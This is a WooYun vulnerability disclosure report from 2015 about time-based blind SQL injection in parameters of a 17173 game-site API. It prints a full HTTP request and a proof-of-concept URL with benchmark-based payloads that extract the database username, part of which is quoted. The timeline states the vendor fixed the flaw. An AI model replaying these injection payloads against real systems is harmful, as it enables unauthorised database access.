17173某接口SQL注入 | wooyun-2015-097539

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-097539

漏洞标题：

17173某接口SQL注入

漏洞详情

披露状态：

2015-02-20：细节已通知厂商并且等待厂商处理中
2015-02-28：厂商已经确认，细节仅向厂商公开
2015-03-05：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

详细说明：

网站api.bk.17173.com
参数uid classid存在延时注入

GET /api/MyQuestionListApi/UserQuestionListInfo?callback=myQuestionCallback1424013270789&_=1424013270789&uid=121494140%20and%20benchmark(20000000%2csha1(1))--%20&page=1&pageSize=50&gameCode=10345&classId=1000172&format=jsonp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.78 Safari/532.5
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Referer: http://v.17173.com/cf/
Cache-Control: no-cache
Host: api.bk.17173.com
Accept-Encoding: gzip, deflate

POC

http://api.bk.17173.com/api/MyQuestionListApi/UserQuestionListInfo?callback=myQuestionCallback1424013270789&_=1424013270789&uid=121494140&page=1&pageSize=50&gameCode=10345&classId=1000172%20and%20if(user()%20like%20'newbaike_fzck_10_59_107_126_h__7__p%',benchmark(2020000%2csha1(1)),1)--%20&format=jsonp

自己弄脚本跑了一下，user用户名字很长newbaike_fzck_10_59_107_126_h__7__p
其中_匹配一个字符，不猜了，过年
ps求rank

漏洞证明：

修复方案：

版权声明：转载请注明来源 Forever80s@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-02-28 09:44

厂商回复：

谢谢~~

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Forever80s@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Forever80s@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞